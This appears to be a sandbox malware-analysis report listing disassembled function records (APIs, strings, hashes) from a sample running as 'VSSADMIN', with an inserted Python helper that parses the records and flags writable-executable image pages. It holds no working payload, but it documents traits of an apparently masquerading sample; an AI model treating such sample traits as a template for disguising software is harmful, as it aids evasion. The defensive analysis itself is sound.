                                                                                                                                                                      • Opcode ID: 974deba25f7d704b68bc438d35764f22adf165380188aa8b9be72cc7fdee2770
                                                                                                                                                                      • Instruction ID: 8d5ede278d034fde43ca452e616bc6d53117661fb95187da014c9fb4eb46146e
                                                                                                                                                                      • Opcode Fuzzy Hash: 974deba25f7d704b68bc438d35764f22adf165380188aa8b9be72cc7fdee2770
                                                                                                                                                                      • Instruction Fuzzy Hash: F031427260CA8299EB24DF65E8951F96370FF8AB94F400136EA4D8BB56DF3DD145C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C774E0: GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
  • Part of subcall function 00007FF614C774E0: FormatMessageW.KERNEL32 ref: 00007FF614C77536
  • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• MessageBoxW.USER32 ref: 00007FF614C72730
• MessageBoxA.USER32 ref: 00007FF614C7274C
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ErrorLast$ByteCharFormatMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 2806210788-2410924014
• Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
• Instruction ID: a14333e64394f4d7aec91c6de1b8a0ec33d43a700be5e5ed5aafd33a599e2923
• Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
• Instruction Fuzzy Hash: C131647262CEC292EA309B14E4916EA6374FF85B94F405037E68D83A59DF3DD745CB40
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
• Instruction ID: e52832263dd51c3d50f8a8cb14844fbee443b16ab54c14f4669ffdd6260e5c8f
• Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
• Instruction Fuzzy Hash: 57F04F65A19E4291EF108B24E48533A5330AF86FB5F540637D56E87AF4DF2ED548C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction ID: df903f3215afb40246e66390c7a8782672b61de48a1f20f8636c4cf7020c10d8
• Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction Fuzzy Hash: 87119122E38E03E5F6541564D4C237720616F57BFCF140A36EA7E876EACE3EA8418138
Uniqueness
Uniqueness Score: -1.00%

APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8AF
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8CE
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8F6
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A907
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A918
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 641b5c1756b5a7a370e8acee299cebcfbeece5c9431c4ccb462b483a43e8f849
• Instruction ID: cb55e11e228a2a7467eeab2d25f24b4dd5abe3b95e3ad79e3ee219c0287d43cd
• Opcode Fuzzy Hash: 641b5c1756b5a7a370e8acee299cebcfbeece5c9431c4ccb462b483a43e8f849
• Instruction Fuzzy Hash: 02113A24F0CE4342FA58936AA5C11BA61725F46FB0F585336E93EC77D6EE2DA442A700
Uniqueness
Uniqueness Score: -1.00%

APIs
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A735
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A754
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A77C
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A78D
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A79E
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: f69b442354946db37e634020f35520dac2635bfc442cf553b2ea1a5b1da725dd
• Instruction ID: 0194e0d27ffd21c3f8c13ecddd487f401db385377c681af90af8ba56de308296
• Opcode Fuzzy Hash: f69b442354946db37e634020f35520dac2635bfc442cf553b2ea1a5b1da725dd
• Instruction Fuzzy Hash: 6C11B728A0DE0342F958A63958D55BA21B24F47F74F180736E93ECB2D3ED2DB442B751
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
• Instruction ID: aa3a720b874d36c084131063d99b8c27c6138291c7ad935d2146308197c8cf15
• Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
• Instruction Fuzzy Hash: 65819C76E0CA5385F7A58E2981F027826B0AB57FA8F558037CB0AD7295DF2DF901A701
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 07a38d77025e1089ea1fead6d05a91cb43271034c61875b0f20f744d27a01972
• Instruction ID: 7708ddf7471669cd0a157c1e602e52a9422c251f8d813d077829149fa74f7ee6
• Opcode Fuzzy Hash: 07a38d77025e1089ea1fead6d05a91cb43271034c61875b0f20f744d27a01972
• Instruction Fuzzy Hash: CC614937A08A858AEB10CF65D4812AD77B0FB46BA9F044226EF4D57B99CF38E155CB40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
• Instruction ID: 016219f5bc2cb5ea05b40b06f03e317a7a95fdaf72173b25056b4d9c293bcfaf
• Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
• Instruction Fuzzy Hash: 50517A3390CA8687EA648F1595C43697BB0FB56FBAF144136DA9C87A95CF3CE4518B00
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID: ..\s\crypto\async\async.c$T
• API String ID: 0-2182492907
• Opcode ID: 8799e63865a8e293b2cab40001efc82bfd0813cd488136d79b3b43ff1dce89a6
• Instruction ID: 802f9e945951e5ce30d473741f45b7def3440447b2cf75787304d1e3b900e9b5
• Opcode Fuzzy Hash: 8799e63865a8e293b2cab40001efc82bfd0813cd488136d79b3b43ff1dce89a6
• Instruction Fuzzy Hash: 62519C76B0CB4A82EB289B21E4606BD7760EF84B80F404435DB4D57B96DFBDE919E700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: getnameinfohtons
                                                                                                                                                                      • String ID: $..\s\crypto\bio\b_addr.c
                                                                                                                                                                      • API String ID: 1503050688-1606403076
                                                                                                                                                                      • Opcode ID: 79083cb44701e26ed1c7acd577477c0fca6b9dec1374fd547b361c2cd0386f0a
                                                                                                                                                                      • Instruction ID: ee68aec3bfb67ae4dec67756e0652d1c0f792339f9932293b33137c4dd975f67
                                                                                                                                                                      • Opcode Fuzzy Hash: 79083cb44701e26ed1c7acd577477c0fca6b9dec1374fd547b361c2cd0386f0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4051D166B1864F82FB689F21E0617BD73A0EB80744F404036EB8D07685DF7DE895A701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID: ..\s\crypto\bio\b_sock.c$J$host=
• API String ID: 0-1729655730
• Opcode ID: 941f2fbceea9f6781c3ad95e534017a9b341198856a0048fa999bb3705f921b3
• Instruction ID: 166de83356c025221d51ff2333b3fa5389908e8c653f5ff2cb5c0bf4ec04eee3
• Opcode Fuzzy Hash: 941f2fbceea9f6781c3ad95e534017a9b341198856a0048fa999bb3705f921b3
• Instruction Fuzzy Hash: 8231D076B0C64682EB18DB65F4A116EB360FB84790F400035EF8C83B9ADF7DD9549B00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 1878133881-2410924014
• Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
• Instruction ID: 0cabe60dd2f0317458d7cc8b18423016e7112c85527d09ac3810cd807fd967c8
• Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
• Instruction Fuzzy Hash: B831857262CA8292EA30D714E4916EA6374FF85F94F804037E68D87A99DF3DD345CB40
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
• API String ID: 3568877910-3633731555
• Opcode ID: be9e9573787046a801f6411ee9a5367fe782c2cd32758e05b582aaf67fa49e75
• Instruction ID: 8181e4560066208bd1a2181c709ea145e92d3fb7a201476ce45fd2ce21a84222
• Opcode Fuzzy Hash: be9e9573787046a801f6411ee9a5367fe782c2cd32758e05b582aaf67fa49e75
• Instruction Fuzzy Hash: A0218CA2B08B4AC1EE54DB55E4201AAB7A0EF84794F444032EB8C47B99EF7DE554EB00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastsocket
• String ID: ..\s\crypto\bio\b_sock2.c$2
• API String ID: 1120909799-2051290508
• Opcode ID: b87478d39e550b6278b10c6495ad9d7c2480af2d970ddb1f34380d70319f0b12
• Instruction ID: b7dae9cd0ce5ed7c1a6189eb1478c9496da866e3f12e899445b48ade3d407241
• Opcode Fuzzy Hash: b87478d39e550b6278b10c6495ad9d7c2480af2d970ddb1f34380d70319f0b12
• Instruction Fuzzy Hash: 3801F572B0864A83E7149B25F4505AD7720FF40764F204235EB6C43AE5CF3DD915DB40
Uniqueness
Uniqueness Score: -1.00%
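
The records above all come from two modules in process 1: the library rebased to 00007FFD3FBF0000 (module index 0F), whose functions still carry OpenSSL source paths (b_addr.c, b_sock.c, b_sock2.c, pem_pkey.c) and whose dumps are marked 00000040, and the main image at 00007FF614C70000 (module index 03, dumps marked 00000020) with the "%s%s: %s" / "Fatal error detected" MessageBoxW path. The following triage helper is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this layout, decodes the dotted fields of each .sdmp name, groups functions by the module base each dump is rebased to, and flags image-backed pages that are both writable and executable. The field layout (<proc>.<scope>.<dumpid>.<address>.<protect>.<flag>.<type>.<module>) and the reading of <protect> and <type> as the Windows MEMORY_BASIC_INFORMATION constants (0x20 PAGE_EXECUTE_READ, 0x40 PAGE_EXECUTE_READWRITE, 0x80 PAGE_EXECUTE_WRITECOPY, 0x01000000 MEM_IMAGE) are assumptions inferred from the values in this report, not something the page documents; the three sample records are condensed from the records above with the Associated and hash lines dropped.

```python
"""Triage helper for Joe Sandbox "Memory Dump Source" function records.

Added example, not Joe Sandbox code. Assumed (inferred from the file names in
the report, not documented by the page): a .sdmp name is
<proc>.<scope>.<dumpid>.<address>.<protect>.<flag>.<type>.<module>.sdmp,
where <protect> and <type> carry the Windows MEMORY_BASIC_INFORMATION values.
"""
import re
from collections import defaultdict

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<scope>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<mod>[0-9A-F]{8})\.sdmp"
)
FIELD_RE = re.compile(r"^\s*•\s*(Source File|API ID|String ID|Opcode ID):\s*(.*?)\s*$", re.M)
OPENSSL_PATH = re.compile(r"\\crypto\\|\\ssl\\")  # OpenSSL source-tree paths left in assert strings


def parse_sdmp_name(name):
    """Split one dump file name into its fields (field meaning is the assumption stated above)."""
    m = SDMP_RE.search(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    f = m.groupdict()
    prot, mtype = int(f["prot"], 16), int(f["type"], 16)
    return {
        "process": int(f["proc"], 16),
        "scope": int(f["scope"], 16),
        "dump_id": int(f["dump"]),
        "address": int(f["addr"], 16),
        "protect": PAGE_PROTECT.get(prot & 0xFF, hex(prot)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        "module_index": int(f["mod"], 16),
    }


def parse_records(report_text):
    """One dict per function record; a record ends at its 'Uniqueness Score' line."""
    records = []
    for chunk in report_text.split("Uniqueness Score"):
        fields = dict(FIELD_RE.findall(chunk))
        if "Source File" not in fields:
            continue
        src, _, rest = fields["Source File"].partition(", Offset: ")
        records.append({
            "dump": parse_sdmp_name(src),
            "base": int(rest.split(",")[0], 16),  # module base the dump is rebased to
            "api": fields.get("API ID", ""),
            "strings": [s for s in fields.get("String ID", "").split("$") if s],  # '$' separates strings
            "opcode_id": fields.get("Opcode ID", ""),
        })
    return records


def module_summary(records):
    """Group records by module base: function count, page flags seen, strings seen."""
    out = defaultdict(lambda: {"functions": 0, "protect": set(), "type": set(), "strings": set()})
    for r in records:
        m = out[r["base"]]
        m["functions"] += 1
        m["protect"].add(r["dump"]["protect"])
        m["type"].add(r["dump"]["type"])
        m["strings"].update(r["strings"])
    return dict(out)


def classify_module(summary):
    """Heuristic label plus an RWX-image flag. Code pages of a normally mapped image are
    PAGE_EXECUTE_READ; PAGE_EXECUTE_READWRITE on MEM_IMAGE means the section was mapped
    or later made writable as well as executable, which is worth a second look."""
    if any(OPENSSL_PATH.search(s) for s in summary["strings"]):
        label = "openssl-derived"
    elif "Fatal error detected" in summary["strings"]:
        label = "launcher fatal-error path"  # caption the PyInstaller bootloader uses for its MessageBoxW
    else:
        label = "unknown"
    rwx_image = "PAGE_EXECUTE_READWRITE" in summary["protect"] and "MEM_IMAGE" in summary["type"]
    return label, rwx_image


# Constructed sample input: three records condensed from this report (Associated/hash lines dropped).
SAMPLE_REPORT = r"""
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• API ID: getnameinfohtons
• String ID: $..\s\crypto\bio\b_addr.c
• Opcode ID: 79083cb44701e26ed1c7acd577477c0fca6b9dec1374fd547b361c2cd0386f0a
Uniqueness Score: -1.00%
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• API ID: Message$ByteCharMultiWide
• String ID: %s%s: %s$Fatal error detected
• Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
Uniqueness Score: -1.00%
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• API ID: 00007
• String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
• Opcode ID: be9e9573787046a801f6411ee9a5367fe782c2cd32758e05b582aaf67fa49e75
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for base, summ in sorted(module_summary(parse_records(SAMPLE_REPORT)).items()):
        label, rwx = classify_module(summ)
        print(f"{base:#018x} functions={summ['functions']} {label} rwx_image={rwx} "
              f"protect={sorted(summ['protect'])} strings={sorted(summ['strings'])}")
```

Run as a script it prints one line per module; feeding it the full report text instead of SAMPLE_REPORT gives the same per-module view for every function record, which is quicker than reading thousands of Associated lines to see which module a string or API came from and which modules were dumped from RWX image pages.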

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorFileLastMessageModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
• API String ID: 2581892565-1977442011
• Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
• Instruction ID: 711d856276ce07ae2e7d2679d58a58d86320b1af73e45da33f543d676ac51ce5
• Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
• Instruction Fuzzy Hash: EF017520B1DE8392FE209724D8863B51275AF5AB96F400133D84DC7292EE5DE155C700
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
